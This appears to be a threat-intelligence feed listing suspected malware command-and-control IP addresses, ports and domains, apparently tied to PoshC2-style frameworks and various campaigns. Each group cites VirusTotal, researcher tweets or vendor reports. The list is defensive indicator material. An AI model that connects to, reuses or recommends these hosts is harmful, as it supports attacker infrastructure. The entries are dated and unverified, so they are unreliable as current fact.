# Reference: https://www.virustotal.com/gui/file/50cd4fbf0ebfe65fc135523fda1525a32dc50764748f863193da22d4616c8666/detection

54.91.111.47:4455
autodontreplyservices.com
ec2-54-91-111-47.compute-1.amazonaws.com

# Reference: https://twitter.com/drb_ra/status/1556069100820086785

96.31.77.61:8888

# Reference: https://www.virustotal.com/gui/file/2932baac30e642651f27b4b7c6f77b9122742f49866da5160e9db776b1e832e9/detection

185.100.65.237:4447

# Reference: https://www.virustotal.com/gui/file/bc556718de6fc8d375c7a4121e7d68632caf1fd5439cfd4d9c48d21e092476e6/detection

bfparty.org

# Reference: https://twitter.com/malwrhunterteam/status/1559881926688784385
# Reference: https://www.virustotal.com/gui/file/16b4a6fec76b452f77a6832871ff2e906d673e557a0e6c2673fc952181d1319b/detection

buckotx.s3.amazonaws.com

# Reference: https://twitter.com/malwrhunterteam/status/1559902576757424130
# Reference: https://www.virustotal.com/gui/file/6634cd044332d28d153519298fd0f68590d966d1c970a80d5a6462fd5a9734ec/detection

azistcool.linkpc.net

# Reference: https://www.virustotal.com/gui/file/eca7dc19194ed6de874c9591106be959f0b4f6ec250f3617634b61aa13639a10/detection

finxiio.com

# Reference: https://twitter.com/pollo290987/status/1560155917341130752
# Reference: https://www.virustotal.com/gui/file/737d0d04046e490f3e69e8ab944487d9bd78d77d6be943811949f00f6b89bdd7/detection

sodkvsodkv.facturas.stuff-4-sale.us

# Reference: https://twitter.com/malwrhunterteam/status/1560584179955314688
# Reference: https://www.virustotal.com/gui/file/e6433b54eeeca4efa18f93bd3d90339114edd040a16083e6d5be17f7f0f655e3/detection

shipminttracking.net

# Reference: https://www.virustotal.com/gui/file/b6173bfaf49c806340d65cd48b9f368a5153c3116c2f724e69cf91ea324563d3/detection

137.184.88.94:9001

# Reference: https://twitter.com/malwrhunterteam/status/1560635393971589122
# Reference: https://www.virustotal.com/gui/ip-address/34.80.234.86/relations
# Reference: https://www.virustotal.com/gui/ip-address/83.69.236.3/relations
# Reference: https://www.virustotal.com/gui/file/de55f77361210aeacf9a5989479c0ad790d31633d6899100fa42828156fc79ed/detection
# Reference: https://www.virustotal.com/gui/file/7596564139a66bb4e164cfcae16940e3c4c7909cbbaae1c60aa4a91061a1e54d/detection

iisn.at
iiso.in
ilsvt.co
looi.io
lslb.in
sisidra.ws
tls-i.in
tls-n.in
tornado.ws

# Reference: https://twitter.com/drb_ra/status/1558253131968008192

65.20.81.201:443

# Reference: https://twitter.com/drb_ra/status/1558431403385257985

anmal.ddns.net

# Reference: https://twitter.com/drb_ra/status/1560810734673661952

164.132.138.128:443
91.194.3.36:443

# Reference: https://www.virustotal.com/gui/file/4cc1b6c78cb2a820743f20316044eec68bfeb25dee7615954de27847cde26229/detection

18.219.180.158:8080
phisher.nastydomain.com

# Reference: https://www.virustotal.com/gui/file/f2e4736e8c1776a983021311ff48404d78f02de5677b187828e7b40544e33cb7/detection

http://35.158.114.105

# Reference: https://www.virustotal.com/gui/file/7ce2a0f058befe3034a1bf27d5aa8c7cdcd79e1a0064bb4e83cb179097fb3b8d/detection

webshare01.onlinesecure365.com

# Reference: https://twitter.com/drb_ra/status/1563141828396056578

d2gzdrbvjbbq9z.cloudfront.net

# Reference: https://twitter.com/drb_ra/status/1563142062798938112

13.234.39.14:443

# Reference: https://www.virustotal.com/gui/file/16007ea6ae7ce797451baec2132e30564a29ee0bf8a8f05828ad2289b3690f55/detection

http://45.89.125.189

# Reference: https://www.virustotal.com/gui/file/454add1bfdc98b944ed97984f1771ec09c9a4c869e3fb6936573d0db8a83ac30/detection

82.2.66.222:21

# Reference: https://www.virustotal.com/gui/file/1da0ce0810952354a5e288a3dd6690338228933c5ff726d317c4748a4322e6dd/detection

82.2.66.222:4444

# Reference: https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/
# Reference: https://otx.alienvault.com/pulse/630f67c49a28f85f26b91f5a

apiregis.com
updatesagent.com
xmlschemeformat.com

# Reference: https://twitter.com/drb_ra/status/1564765008503967749

3.121.201.91:8080

# Reference: https://www.virustotal.com/gui/file/74a75862bd3fb1df2110cfa2f4de6a56c6370c4aba30df4c6b98ea3346d6366a/detection
# Reference: https://www.virustotal.com/gui/file/0439db34ebaca953064a84b4976b5d0533076594f4d92b6b0d7829988845dbca/detection

pc2.heapack.com

# Reference: https://twitter.com/drb_ra/status/1566577843886227459

54.39.238.131:1335

# Reference: https://www.virustotal.com/gui/file/8e698623199611102ffb0e72e86d76c9a2178e4efb3e7346bcfb37269074e6bc/detection
# Reference: https://www.virustotal.com/gui/file/c8117e93fa43454f1bfd6ecd0324dd08f55beae4258e63d484f72b6aafbdf40d/detection

huntsman-dfir.tech
malware-analysis.huntsman-dfir.tech

# Reference: https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/
# Reference: https://www.virustotal.com/gui/file/c23e61db0e74e6d48ba27f17461abc88c700e0a386ffdbd4c1a1571ebf630d4f/detection

i-development.one

# Reference: https://twitter.com/malwrhunterteam/status/1567135765569671168
# Reference: https://www.virustotal.com/gui/file/518a0d736b7d9e015548c7bf2eb3b9692817caf67acc20869f68adc5af5b7200/detection

scorpio-cdn.com

# Reference: https://twitter.com/malwrhunterteam/status/1567146303674585090
# Reference: https://www.virustotal.com/gui/file/78cc518559f2348e4c959848d0c2671e96d16c166db0aaa7633dd67ab6bc58ef/detection
# Reference: https://www.virustotal.com/gui/file/bcb1fed53879768a3fa7b6d7f77695e9f2971a20e2cbb5df0b2a0a83c3088946/detection

http://168.119.107.156

# Reference: https://www.welivesecurity.com/2022/09/06/worok-big-picture/
# Reference: https://otx.alienvault.com/pulse/63174ac2e0c9d93ffa7e32f5

suhypercloud.org
travel-commercials.agency
airplane.travel-commercials.agency
bus.travel-commercials.agency
fly.travel-commercials.agency
train.travel-commercials.agency
central.suhypercloud.org
customer.suhypercloud.org
srv.suhypercloud.org

# Reference: https://twitter.com/drb_ra/status/1566942796153511936

185.64.247.240:4443

# Reference: https://www.virustotal.com/gui/file/be746568cc611f15da95184f3080f2d976f9c45e09b77e10d5916e99b2ab5555/detection

85.209.179.63:4444

# Reference: https://www.virustotal.com/gui/file/93f73b12dae2cc2629bd301941a995e4833c10e27a988c929f21257edbef14c3/detection

137.224.106.4:73

# Reference: https://www.virustotal.com/gui/file/e3416839a6b0aad2e470b8ab7c2b27c8a8919686ffbdbf5f1496a3edebb22f8f/detection

82.167.230.163:7331

# Reference: https://www.virustotal.com/gui/file/d7a5fbc4865a624221fc15de663c4abe9628865ffda7fdf77a350ac67e57f82e/detection

20.224.161.53:1000

# Reference: https://www.virustotal.com/gui/file/a8e002532b37acf502145cff1f6485877c524a6075bbcae537c758ee22bb3900/detection

162.241.224.143:9001

# Reference: https://www.virustotal.com/gui/file/31b9785480154d9def6cefb099b5dd32716634a9cfa4baf471c2164ef6f58028/detection

209.25.141.181:20960

# Reference: https://www.virustotal.com/gui/file/9fad60dd882e26b555f5127ffc7b70326f57ab84271185bbbf469e5eb1ed5e4b/detection

5.183.95.123:443

# Reference: https://twitter.com/malwrhunterteam/status/1567887497090285569
# Reference: https://www.virustotal.com/gui/file/2e551962c5d2641f8ff5e35156e7b2f1a02f6c0c29c4066692a7e14541f5ac93/detection

185.43.7.204:443

# Reference: https://twitter.com/malwrhunterteam/status/1568190202266386434
# Reference: https://www.virustotal.com/gui/file/bc6202d58b5ed72e9b23b617f5a3d2888169f471af884b573d67e8a58fe5d4c5/detection

bashamed.org
zeytoonict.com

# Reference: https://twitter.com/malwrhunterteam/status/1568198491226226688
# Reference: https://www.virustotal.com/gui/file/8ae18fc31866c3a35ede249b97457598e78cb6a0988df1dd58b9ddb1f3e88c05/detection

woo097878780.000webhostapp.com

# Reference: https://twitter.com/drb_ra/status/1568421255627550720

173.82.212.78:443

# Reference: https://twitter.com/StopMalvertisin/status/1568529585893175296
# Reference: https://twitter.com/StopMalvertisin/status/1568529591991693313

http://185.45.192.208
http://185.82.202.121

# Reference: https://www.virustotal.com/gui/file/2062108b6af5401e11ecc1666906745f499449e3e80bd3e439b6a0132afec3cb/detection
# Reference: https://www.virustotal.com/gui/file/bb5afa2cc56710ed33c78dbf56120628cc9b3f120d7847a92efd86a19a14e573/detection

spoilgrey.com

# Reference: https://twitter.com/malwrhunterteam/status/1570430443983441921
# Reference: https://www.virustotal.com/gui/file/917c20c5de91f02122a2cfe9d97c70294b1a38d1c1aead5dd6765a39621086f4/detection

d23grfsvusxgzv.cloudfront.net

# Reference: https://www.virustotal.com/gui/file/2d7613b00471b735332dd5ba14bfa05da3d04c79e34304a4419244ff60ee3017/detection

irc.us.org

# Reference: https://twitter.com/malwrhunterteam/status/1570008286417813506
# Reference: https://www.virustotal.com/gui/file/aabe271f846165939b72213794ac12099bac575b250c71cce1f80919c76c0ba9/detection

test.dfir.com.au

# Reference: https://twitter.com/malwrhunterteam/status/1571064193956319235
# Reference: https://www.virustotal.com/gui/file/2de7c6cbb107b72c67711008a704284f24a0e7294316109b87bb6ff1b06fe397/detection

host1849145.hostland.pro

# Reference: https://twitter.com/StopMalvertisin/status/1571136090760966144
# Reference: https://www.virustotal.com/gui/file/797e74d61badfcd0b2fc15b467cc5aee5eeec93b1ac41ccf08749740f10ae475/detection
# Reference: https://www.virustotal.com/gui/file/33b77459b3b88949e2110f81c77c5024f2701a5bfa580f275da9b8f2316c2c73/detection

142.93.204.150:4433

# Reference: https://twitter.com/abuse_ch/status/1572833978184499201
# Reference: https://tria.ge/220921-g1gwdabadl

149.57.171.69:8080

# Reference: https://www.virustotal.com/gui/file/59d451917630e02e1c38ce6485e187f403279abc0f1afc744f82dd3b9c4a4ccb/detection

6-express.ch

# Reference: https://www.virustotal.com/gui/file/8c785cfe27ba43be28feb28ea9f056a65cebe62abd652f11b82196d819853d37/detection

workplaceanddiversity.com
updatepkg8.workplaceanddiversity.com

# Reference: https://twitter.com/malwrhunterteam/status/157361918168947507
# Reference: https://www.virustotal.com/gui/file/b2de5e474c1a933468603795e736d7d7dfdc8e13b5f14e6fba7e9849298cc8bb/detection

105.108.117.187:21000
105.108.198.242:21000
105.109.159.46:21000
154.246.109.149:21000
154.246.113.83:21000
154.246.146.88:20000
154.246.234.136:21000
154.247.9.173:21000
197.207.8.74:21000
webjava.mywire.org

# Reference: https://www.virustotal.com/gui/file/8fa32222a5317a6734271299d86c84b0041c0d41959f2b9a76b00af92818cda8/detection

104.248.32.159:443

# Reference: https://twitter.com/MichalKoczwara/status/1574103025693622277

/PoshC2.bat

# Reference: https://twitter.com/malwrhunterteam/status/1574440704838963201
# Reference: https://twitter.com/StopMalvertisin/status/1574442449983836160
# Reference: https://www.shodan.io/host/176.124.219.223
# Reference: https://www.virustotal.com/gui/file/59d86574bc99b593abdcf563628af93581eb109748951cac649b3076c70f215d/detection
# Reference: https://www.virustotal.com/gui/file/1cb4c0402251b5ed56c0a7f6e4d3c4ede4d5a34ece829077a0e2dd3d2523fce0/detection

176.124.219.223:135
176.124.219.223:49664
176.124.219.223:49665
176.124.219.223:49666
176.124.219.223:49667
176.124.219.223:49668
176.124.219.223:49670
176.124.219.223:49682

# Reference: https://www.virustotal.com/gui/file/8cdf57dda39f0a10b6f176bc623faba45ed0540d520876b4b67828846f9d7cdb/detection

172.93.181.204:8000

# Reference: https://twitter.com/malwrhunterteam/status/1575453078987366400
# Reference: https://www.virustotal.com/gui/file/558334aa04310114c9433cbd33f44bb35b05f6bd0a29be944adc086215f3b65b/detection

bypass.today

# Reference: https://twitter.com/drb_ra/status/1577506068212719618

213.226.123.157:9197

# Reference: https://twitter.com/drb_ra/status/1570773343258697729

http://188.166.116.129

# Reference: https://twitter.com/drb_ra/status/1573681067541798912

188.166.116.129:6969

# Reference: https://twitter.com/drb_ra/status/1576372562958991361

45.14.224.190:443

# Reference: https://twitter.com/RedPacketSec/status/1577046901194690585

103.27.203.197:444

# Reference: https://twitter.com/RedPacketSec/status/1577046902310375428

18.132.247.80:443

# Reference: https://www.virustotal.com/gui/ip-address/216.240.130.72/relations
# Reference: https://www.virustotal.com/gui/file/8b9c05a1e4a3b701bf8d2229a70bc83cc25b975ab16dbc2a2d0f98d319eeae0a/detection

gamesnetb.com
443.gamesnetb.com
443.onedriveup.today
disk.camdvr.org
disk.casacam.net
netdisk.780wow.com
netdisk.ddnsgeek.com
pan20220109.onedriveup.today
rack.780wow.com
rockdisk.ddnsfree.com

# Reference: https://www.virustotal.com/gui/file/fc47b1c0aeb5f6b19af07329a889e39640c626b89ef2e58fe1ec2f0742b0810b/detection

37.0.14.202:3030

# Reference: https://twitter.com/drb_ra/status/1582887247170351105

185.64.247.59:4443

# Reference: https://twitter.com/malwrhunterteam/status/1583197120105877504
# Reference: https://www.virustotal.com/gui/file/5d2f1d7a4f8cda18fd9103e686c811f8e60afc40d3b97b4e05e1394b1c01182c/detection

s5grdzk4uv23llh6ahlx2n2d2s4elzrdrok5rkf7qnhgytud2cqiy6yd.onion.ws
/whatnoplease

# Reference: https://twitter.com/drb_ra/status/1584160635729809410

c2.nathancoats.com

# Reference: https://twitter.com/drb_ra/status/1584355435984785408

192.9.169.86:443

# Reference: https://twitter.com/drb_ra/status/1584886337282375680

adpworkforce.app

# Reference: https://twitter.com/drb_ra/status/1585613063952138240

45.137.117.200:443

# Reference: https://twitter.com/h2jazi/status/1586128535004987392
# Reference: https://www.virustotal.com/gui/file/f7c3ca865baa3553ab44e1cd8f6cf0421a2e4bc12d228abda1296069a07d86b4/detection

d1codu14p1gdvw.cloudfront.net

# Reference: https://twitter.com/drb_ra/status/1586705416779612165

116.203.51.117:443

# Reference: https://www.virustotal.com/gui/file/1b82739880e1851d032b09de787033bd19135c8496124cd505b32afe4212b7b0/detection

http://89.22.233.149

# Reference: https://twitter.com/malwrhunterteam/status/1587571283159547906
# Reference: https://www.virustotal.com/gui/file/ab2f0ffb3a1f762f0de9bc5bd8b529232729f1f790eb07c55097ad3eb204d061/detection

192.46.211.76:443
192.46.211.76:8000
lelouch.tk
a.lelouch.tk

# Reference: https://twitter.com/malwrhunterteam/status/1588580672121470977
# Reference: https://www.virustotal.com/gui/file/ae6c02ba554be6dcda3610e8048d0649418f96ed0a8e2cda0a9d27ed4a46ddcc/detection

45.141.215.215:8080
sisal-policy-italy.duckdns.org
sisal-updater.duckdns.org

# Reference: https://twitter.com/drb_ra/status/1588154272402870272

74.208.135.130:443

# Reference: https://twitter.com/sysk1ll3r/status/1589615455396040706
# Reference: https://www.virustotal.com/gui/file/aaa97571b8c811109ab623de66ca34027193e0e78835abd187f6c5750fc1c6d2/detection
# Reference: https://www.virustotal.com/gui/file/0976d94f317fc0050d2e6250b327044b49320fd9ab283d6d9b3d192ef2ff328f/detection

http://195.133.40.130
http://20.106.255.48

# Reference: https://twitter.com/drb_ra/status/1589958958869090304

/babel-polyfill/6.3.14/polyfill.min.js
/babel-polyfill/6.3.14/polyfill.min.js=/

# Reference: https://twitter.com/r3dbU7z/status/1590276341106356229

http://45.154.98.151
45.154.98.151:443
45.154.98.151:777
niva.linkpc.net

# Reference: https://twitter.com/ScumBots/status/1591185331474374675
# Reference: https://www.virustotal.com/gui/file/8f1e1aa4ffded36e953eaf3b679fca21bffc5ca1c837c03fe97ba9ecf93b39fa/detection

193.161.193.99:23235

# Reference: https://twitter.com/ScumBots/status/1590743667064586241
# Reference: https://www.virustotal.com/gui/file/6de48c8c9301b869034fab854c3d518810c2bcc0957093b4739ef0e16912fc3c/detection

jeffersonfilho-23235.portmap.host

# Reference: https://twitter.com/drb_ra/status/1591227919493373952

http://45.93.31.122
/adServingData/PROD/TMClient/6/8736/

# Reference: https://www.virustotal.com/gui/file/d2432ae81241cd0041c23c81b7ddb874ac29b8cc77025a44b41c249a41f3a094/detection

193.33.195.152:3000

# Reference: https://twitter.com/malwrhunterteam/status/1592231757461741569
# Reference: https://www.virustotal.com/gui/file/af3b595215fe40422c0d4a10bbfc2d0e609edf315fbcb372951eea626f58f41f/detection

3mtbusa.com

# Reference: https://twitter.com/drb_ra/status/1593418944332894209

microsoftonedrive.online

# Reference: https://twitter.com/drb_ra/status/1593779349982879744

emergency-coms.com
cc.emergency-coms.com

# Reference: https://twitter.com/luc4m/status/1595105175492087810
# Reference: https://www.virustotal.com/gui/file/49d1d6bfc32f81df0fa87f715be219c26de59067ff1c6e17a2564598900a2a3c/detection

http://146.70.87.186

# Reference: https://twitter.com/malwrhunterteam/status/1594818792084971523
# Reference: https://www.virustotal.com/gui/file/0fa2e2f524101e9c5e911e193e7fb145463c0c2a72a5fb14f8f11a8ae3a18593/detection

201.121.29.197:81
201.121.68.116:81

# Reference: https://twitter.com/drb_ra/status/1595767943841058817

159.65.92.230:443

# Reference: https://github.com/conexioninversa/MalwareIntel/blob/main/C2_Posh.txt

http://146.59.201.131
109.234.36.5:443
109.248.6.221:443
132.145.106.12:8443
146.190.86.212:4443
159.223.20.20:443
159.69.180.8:443
165.22.119.30:443
178.20.47.220:443
184.72.153.18:443
185.193.126.28:443
192.18.141.199:443
193.36.15.251:443
20.218.128.59:443
3.65.198.167:443
3.72.176.74:443
34.235.5.141:443
44.192.81.16:443
45.137.117.200:8443
62.182.159.147:443
79.51.197.75:443
94.130.106.165:443
95.164.87.82:443
95.213.145.101:443
98.142.143.13:8000

# Reference: https://github.com/conexioninversa/MalwareIntel/blob/main/C2_PowerSploit.txt

http://190.157.37.153
http://82.157.181.130
http://88.91.32.192
18.209.76.109:8080

# Reference: https://twitter.com/malwrhunterteam/status/1596217071742128128
# Reference: https://www.virustotal.com/gui/file/74712e4b42600980566b6dc10df3fb2f63a7daefc3e28abc591d222e3fe0ece0/detection

161.49.96.244:13373
gsismo.com

# Reference: https://www.virustotal.com/gui/file/71459112f7bd7cda5d383db74555399740c532064537aa876c45657438381ccf/detection

http://62.204.41.222

# Reference: https://twitter.com/ScumBots/status/1598210368408543233
# Reference: https://www.virustotal.com/gui/file/eee29a4a94a23810cab689c09e4a83362278a344f3364ee371defcdd96c8e195/detection

154.12.244.1:46969

# Reference: https://twitter.com/ScumBots/status/1596161656874221568
# Reference: https://www.virustotal.com/gui/file/8198e99eec93b479880e3a05a3148fb6f849bd1a678d9d1589582e9255553bdc/detection

194.163.157.141:4444
furfag.xyz

# Reference: https://twitter.com/drb_ra/status/1598305446137589760

159.223.20.20:443

# Reference: https://twitter.com/drb_ra/status/1598474873675866114
# Reference: https://www.virustotal.com/gui/file/44cbf54f2bf9d02e326f24bc3d0bbf5d6e070d17407afd404acdca2366da643c/detection

http://34.235.5.141
evilredteamthings.com

# Reference: https://twitter.com/xorJosh/status/1598646907802451969

193.201.9.101:11196

# Reference: https://twitter.com/malwrhunterteam/status/1599836594844098560
# Reference: https://www.virustotal.com/gui/file/5002bad1d29e3bb13f1c52be33796963564e639852ecf347503eb1fc2c8c4a89/detection

merry-froyo-94e086.netlify.app

# Reference: https://twitter.com/ScumBots/status/1600165757303783425
# Reference: https://www.virustotal.com/gui/file/68493c8e28d56058cc5fb345c037f37ba97a738f15e78e3fe8e94749cb809d40/detection

95.90.54.183:8080

# Reference: https://twitter.com/ScumBots/status/1600168337576808452
# Reference: https://www.virustotal.com/gui/file/e69cc36ecb2e75c8f9b969eb6f3cf37a371e33375f1b466b47e0e261340a9367/detection

95.90.54.183:8

# Reference: https://twitter.com/ScumBots/status/1600228665178132518
# Reference: https://twitter.com/ScumBots/status/1600228737768951838
# Reference: https://www.virustotal.com/gui/file/341f194d9ccc811fcc3995eee085f66e299a17aa2272b8a91b3093de281bfac9/detection
# Reference: https://www.virustotal.com/gui/file/d1644309bcecc22c100bd188d2b8ae6072d89113378c90e131672de97c8e49cc/detection

209.165.201.17:4444

# Reference: https://www.virustotal.com/gui/file/e56cbac2134c6bcb67cf25428f8d7db959d341a26d81e4eb4f9f77e7186e5906/detection

http://155.133.23.244

# Reference: https://twitter.com/malwrhunterteam/status/1601189140305186817
# Reference: https://www.virustotal.com/gui/file/d1a4a68b2dc8689752a51b596e383f380c974593f4478fee79f0cac6627f2ae8/detection

20.172.137.101:8080

# Reference: https://www.virustotal.com/gui/file/b1b86bdefc10d4f3fb18fd2d6fcc4cf9e8ed73c108c772e0870f3545731cb3f5/detection
# Reference: https://www.virustotal.com/gui/file/4a614fbe0450a785de13f100465b8212d03e8f358676d2d8e54022bf991e1142/detection
# Reference: https://www.virustotal.com/gui/file/3fbb76f59491281628c762e16b1f07724f1dccf207b13aff3b6ec405143fb7b5/detection

jobbfinderrr.xyz
xvfghtyua.000webhostapp.com

# Reference: https://www.virustotal.com/gui/file/46ed79dc34684fe4e0eb948bb4c8804fa9422a2b5774ee122fc7a24ef67d09d1/detection

3.142.141.21:8080

# Reference: https://www.virustotal.com/gui/file/593c91faf0605f937b676f0f6aea7324fd0800fcf630ca0c591aa18fa2c97238/detection
# Reference: https://www.virustotal.com/gui/file/427d31a39e30e238772ec5c7a7e5f21456455ca2c14ed33c3b637ddaafdf8d36/detection

3.142.141.21:30303

# Reference: https://www.virustotal.com/gui/ip-address/3.142.141.21/relations

ms-security-desk.cf

# Reference: https://www.virustotal.com/gui/ip-address/18.222.107.105/relations
# Reference: https://www.virustotal.com/gui/file/474a83ab9e606773f64bce7d639dae8a56f262af53ef0e7ee0d5be2bc6695d88/detection

18.222.107.105:1335

# Reference: https://twitter.com/ScumBots/status/1602702148290154496
# Reference: https://www.virustotal.com/gui/file/907610dddd18d371a814dafb80bf5fae3743cf2867b2f31590263f7c9c9114dc/detection

212.86.109.121:443

# Reference: https://twitter.com/ScumBots/status/1602858497409966080
# Reference: https://www.virustotal.com/gui/file/7a35b26ca56a9c4d04af40eded45352c5d1b8e1d8118a1dc26e5a5a80a1114e2/detection

18.229.146.63:16497

# Reference: https://twitter.com/ScumBots/status/1603359300478533632
# Reference: https://www.virustotal.com/gui/file/47a14e36512627b8f66d448935f547a8cd117a6761385fb178303795084cbf11/detection

54.37.161.92:22

# Reference: https://twitter.com/ScumBots/status/1603361811658596352
# Reference: https://www.virustotal.com/gui/file/ac0ac1aa9a3ca544a1218c836e42e858ec0e10444c72c09b2f1f9191ebfad636/detection

34.126.164.120:22

# Reference: https://twitter.com/ScumBots/status/1604028706950889474
# Reference: https://www.virustotal.com/gui/file/d0a7bd25b378287585c36b96d279de61374155a26916ea18509754644ad7cd03/detection

34.126.109.143:22

# Reference: https://www.virustotal.com/gui/file/d74ba5885f7659e58ae5a3d739ad7cc2be61917c13fd4ab4637a14a9f40851ae/detection

mamonci.ga
jacksonmuhammad990.duckdns.org

# Reference: https://www.virustotal.com/gui/file/9e9ed31263978322e1dcfb1e30e9e0958d7ba1e4e32b0e2d6286861ecd1c9c58/detection

http://185.29.10.41

# Reference: https://twitter.com/ScumBots/status/1604436389726142464

172.245.92.207:443

# Reference: https://twitter.com/ScumBots/status/1604884348305539075
# Reference: https://www.virustotal.com/gui/file/b485020628c5eb8f6964f79e89a9a3f522197210e300e820fc796763108a8ddf/detection

35.240.198.92:22

# Reference: https://twitter.com/ScumBots/status/1604891894366015488
# Reference: https://www.virustotal.com/gui/file/c071dcff79e062d648272664093f9886070e2df9b91ccfcf4332d296341fd05e/detection

20.226.72.14:22

# Reference: https://twitter.com/r3dbU7z/status/1604992480830967808

http://104.238.149.39

# Reference: https://twitter.com/malwrhunterteam/status/1604964169023115264
# Reference: https://www.virustotal.com/gui/file/b3cb1b5e3d828e25d9802cc536dd89e347bb70528285e1bf1e1acf123fb4659e/detection

letshackit.shohos.com

# Reference: https://www.virustotal.com/gui/file/e019717ced89e11e199b1480a5f3d85cda81181141f906093f39e0d2a13d9c5c/detection

3.129.187.220:11830
3.131.147.49:11830
3.133.207.110:11830
3.136.65.236:11830
3.138.180.119:11830
3.22.15.135:11830

# Reference: https://www.virustotal.com/gui/file/e724b87d50e009d1f60874451295724dff48d10231a9e5cc9c124acf962bf97d/detection

11.23.33.44:10225

# Reference: https://www.virustotal.com/gui/file/cd3dfff05a8b3134ebddd96e081465ed1f2fa847511976bc2eebed34eb114ae5/detection

3.22.53.161:13575

# Reference: https://twitter.com/VirITeXplorer/status/1605592225559089152
# Reference: https://twitter.com/VirITeXplorer/status/1605592378110119936

34.116.134.195:49751

# Reference: https://twitter.com/MichalKoczwara/status/1605658798437199872

62.182.159.147:8000

# Reference: https://twitter.com/ScumBots/status/1606044491546337280

195.58.39.167:8080

# Reference: https://unit42.paloaltonetworks.com/threat-brief-OWASSRF/

140.82.52.35:443
192.248.176.138:443
216.128.146.38:443
217.69.10.255:22
45.32.144.71:443
45.76.246.112:22

# Reference: https://twitter.com/malwrhunterteam/status/1608154920011825155
# Reference: https://www.virustotal.com/gui/file/6d4bc2f881d3b7c9df405e5550268db7382dd06e3451e0815cf365a6ef25ff90/detection

http://193.149.187.234

# Reference: https://twitter.com/pmelson/status/1609602465015414786
# Reference: https://www.virustotal.com/gui/file/4f3a7247427aa4cd1995b6ef6b41031c0e7c53e7fbf015c5bcc8a8195bc62b3c/detection
# Reference: https://www.virustotal.com/gui/file/2573edb9592715b7e0048056279d6d707c959fe815148f733e60b4eb0fca3aea/detection

ahoravideo-blog.com
ahoravideo-blog.xyz
ahoravideo-cdn.com
ahoravideo-cdn.xyz
ahoravideo-chat.com
ahoravideo-chat.xyz
ahoravideo-endpoint.com
ahoravideo-endpoint.xyz
ahoravideo-schnellvpn.com
ahoravideo-schnellvpn.xyz
bideo-blog.com
bideo-blog.xyz
bideo-cdn.com
bideo-cdn.xyz
bideo-chat.com
bideo-chat.xyz
bideo-endpoint.com
bideo-endpoint.xyz
bideo-schnellvpn.com
bideo-schnellvpn.xyz
cesareurope.com
fairu-blog.com
fairu-blog.xyz
fairu-cdn.com
fairu-cdn.xyz
fairu-chat.com
fairu-chat.xyz
fairu-endpoint.com
fairu-endpoint.xyz
fairu-schnellvpn.com
fairu-schnellvpn.xyz
k6027.eu
privatproxy-blog.com
privatproxy-blog.xyz
privatproxy-cdn.com
privatproxy-cdn.xyz
privatproxy-chat.com
privatproxy-chat.xyz
privatproxy-endpoint.com
privatproxy-endpoint.xyz
privatproxy-schnellvpn.com
privatproxy-schnellvpn.xyz
wmail-blog.xyz
wmail-cdn.com
wmail-cdn.xyz
wmail-chat.com
wmail-chat.xyz
wmail-endpoint.com
wmail-endpoint.xyz
wmail-schnellvpn.com
wmail-schnellvpn.xyz

# Reference: https://twitter.com/ScumBots/status/1610836059171987458
# Reference: https://www.virustotal.com/gui/file/56ad36ce1198a3da04f1caaad5dce450dface16309df8757a61dfe87548bebc4/detection

35.247.134.103:22

# Reference: https://www.virustotal.com/gui/file/c47a352bbb2d61a67a96b07695d5b31568ae1f9e9cfd649637570289bffbb19f/detection

poisonhosting.live

# Reference: https://twitter.com/ScumBots/status/1614464983122706435
# Reference: https://www.virustotal.com/gui/file/7bc9afd562babf7e328c1264dd95ff88d62cef6e41d0b5b1a4265cd2ba3d12fd/detection

34.87.169.136:22

# Reference: https://twitter.com/ScumBots/status/1614548033575817218
# Reference: https://www.virustotal.com/gui/file/b90b8990514c7a059fc25d4f2d49e95c2b99ab63354af58fee859c1502d2bfca/detection

165.22.76.250:22

# Reference: https://www.virustotal.com/gui/file/f854ee6b89136167029b67a2b53c55d438df3099530b352d3e7766daaba9369d/detection

http://194.180.48.211

# Reference: https://twitter.com/malwrhunterteam/status/1615066293652029440
# Reference: https://www.virustotal.com/gui/file/97eb0366f9f0fe5d8e0b53a92c5b6b315e867634dc15a5f0155fc8fb2919c3a1/detection

enhanced-google.com

# Reference: https://twitter.com/drb_ra/status/1614775265619578880

185.111.207.102:8080

# Reference: https://twitter.com/drb_ra/status/1615358787128545280

185.193.126.28:443

# Reference: https://twitter.com/malwrhunterteam/status/1615409256219480086
# Reference: https://www.virustotal.com/gui/file/68454ddcd864cd72fd03d0682f6a6e1e2cc0a2220ac1f3645dce6b4ffc801fb4/detection

lattescremato.xyz
miraistealer.xyz

# Reference: https://www.virustotal.com/gui/file/0dac98b37e63036bcd0ff0d8c1764337884b764895a9890b6fd3f6d449ef03c6/detection

russianmen75.top

# Reference: https://twitter.com/malwrhunterteam/status/1615801267913379841
# Reference: https://www.virustotal.com/gui/file/65d00e6ea3afb5ddc4c0a4e3939d08749c13ba1ccf7ebf00cd9426e3f2f0cf34/detection

164.92.162.96:1980
thelegendo.duckdns.org

# Reference: https://twitter.com/malwrhunterteam/status/1615815578886733829
# Reference: https://www.virustotal.com/gui/file/76dbc25ab7e6a68da4e09d7d5be440a81b12cbc756167fc1541a2d476b1d4c50/detection

188.132.130.60:8848

# Reference: https://www.virustotal.com/gui/file/ac3afc5b7972d04750df994044c154cfe1a8b14f66e1785d2d07683cf3ce515a/detection

healthnewsallover.com
hjordans.com

# Reference: https://www.virustotal.com/gui/file/04b3b20749f0368b84326c117709e00a7abdc2e1e2827a19765d07fb27192626/detection

bllsl1.shop

# Reference: https://www.rapid7.com/blog/post/2023/01/19/etr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability/

111.68.7.122:8080
111.68.7.122:8081
149.28.193.216:8080
149.28.193.216:8081
172.93.193.64:8080
172.93.193.64:8081

# Reference: https://twitter.com/drb_ra/status/1617150178691006464

141.145.213.10:443

# Reference: https://twitter.com/1ZRR4H/status/1617295296014471169
# Reference: https://www.virustotal.com/gui/file/3e09a109f1b6b8a7c4fff965aeceb874557835d2b25b6b38e2a1ee33f3896a29/detection

frun.digital
otun1.xyz

# Reference: https://twitter.com/nosecurething/status/1617598720048263168
# Reference: https://www.virustotal.com/gui/file/6795bc29e730807523a7896f7666a2b5d9bf9b3ec5175956aadb42370c26316f/detection
